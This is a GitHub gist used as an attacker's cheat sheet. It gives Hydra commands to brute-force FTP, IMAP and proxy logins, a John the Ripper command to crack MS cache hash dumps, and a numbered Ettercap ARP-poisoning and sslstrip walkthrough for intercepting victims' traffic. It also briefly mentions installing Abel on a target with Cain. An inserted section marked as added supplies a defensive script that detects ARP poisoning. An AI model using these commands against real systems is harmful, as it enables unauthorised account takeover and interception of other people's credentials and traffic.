@cmartinbaughman
Created October 25, 2011 20:38
Commands to remember...
#Cracking an FTP server (use whatever service you want; THC Hydra supports lots!)
hydra -L wordlist.txt -P passlist.txt 192.168.1.1 ftp
#Other handy THC Hydra commands~!
#Log in to ftp service with -l user and -p password:
./hydra -l john -p doe 192.168.0.1 ftp
#Log in to IMAP service using user wordlist with -L user.txt and the password -p secret:
./hydra -L user.txt -p secret 192.168.0.1 imap PLAIN
#Log in to http-proxy trying user -l admin and password list:
./hydra -l admin -P pass.txt http-proxy://192.168.0.1
#Use the -C argument for a username:password formatted text file; -6 uses IPv6:
./hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
#Crack MS CACHE password dumps:
#dumpfile in format: admin:23acb302913da1293840329a12931ac
john -i:all -format:mscash dumpfile.txt
#Ettercap Man In The Middle ARP sniffing attack:
#NOTE: Launch ettercap GUI with packet dump:
ettercap -G -w ~/ettercap_packets.pcap
#Stripping SSL with Ettercap and sslstrip:
1. Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
2. Verify the entry in nat table
sudo iptables --list -t nat
3. Enable forwarding
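# The redirect must run as root too, so write through sudo tee ("sudo echo ... >" redirects as the calling user)
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward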
4. Check forwarding
sudo cat /proc/sys/net/ipv4/ip_forward  # NOTE: You should get 1 as a reply
5. Run sslstrip logging on port 10000
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
6. Monitor the log
sudo tail -F sslstrip.log
7. Run ettercap -G -w ~/ettercap_packets.pcap and perform the following in the GTK Ettercap NG GUI:
a. Sniff -> Unified sniffing
b. Hosts -> Scan for hosts && Hosts -> Hosts List
c. Targets: TARGET 1 - Host(s) you want to attack, TARGET 2 - IP of router/switch or access point
d. Mitm -> Arp poisoning - turn on Sniffing!
#CAIN & ABEL
#Open Cain (GUI), go to networking and select the computer to compromise, then right-click and select install Abel; then you can do all kinds of stuff ;)
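
From the defender's side, the ARP poisoning step above shows up in a victim's neighbour table as the router's IP sharing a MAC address with another host. The shell example below is added here and is not part of the original gist; it checks `ip neigh show` output for that symptom, and the function names and sample table are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the gist): flag MACs that answer for more than one
# IPv4 address in `ip neigh show` output, the symptom ARP poisoning leaves.

# find_shared_macs: reads neighbour lines on stdin, prints
# "<mac> <ip1>,<ip2>,..." for each MAC claimed by two or more IPv4 addresses.
find_shared_macs() {
    awk '
    {
        mac = ""
        for (i = 1; i < NF; i++)
            if ($i == "lladdr") mac = tolower($(i + 1))
        # No lladdr (FAILED/INCOMPLETE) or IPv6 neighbour: ignore. A host
        # legitimately shares one MAC between its IPv4 and IPv6 addresses.
        if (mac == "" || $1 ~ /:/) next
        if ((mac, $1) in seen) next
        seen[mac, $1] = 1
        count[mac]++
        ips[mac] = (count[mac] > 1) ? (ips[mac] "," $1) : $1
    }
    END {
        for (m in count)
            if (count[m] > 1) print m, ips[m]
    }' | sort
}

# gateway_is_spoofed GATEWAY_IP: same stdin; returns 0 when the MAC of the
# gateway is also claimed by another IPv4 address.
gateway_is_spoofed() {
    find_shared_macs | awk -v gw="$1" '
    {
        n = split($2, a, ",")
        for (i = 1; i <= n; i++) if (a[i] == gw) found = 1
    }
    END { exit (found ? 0 : 1) }'
}

# Constructed sample: 192.168.0.1 (router) and 192.168.0.66 share one MAC.
SAMPLE_NEIGH='192.168.0.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.0.66 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.168.0.20 dev eth0 lladdr 66:77:88:99:AA:BB REACHABLE
192.168.0.30 dev eth0  FAILED
fe80::1 dev eth0 lladdr 00:11:22:33:44:55 router STALE'

# On a live host: ip neigh show | find_shared_macs
printf '%s\n' "$SAMPLE_NEIGH" | find_shared_macs
```

Proxy ARP, virtual IPs and multi-homed hosts can also share a MAC, so treat a hit as a lead to confirm against the router's known MAC address.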
@rad123456789r

pass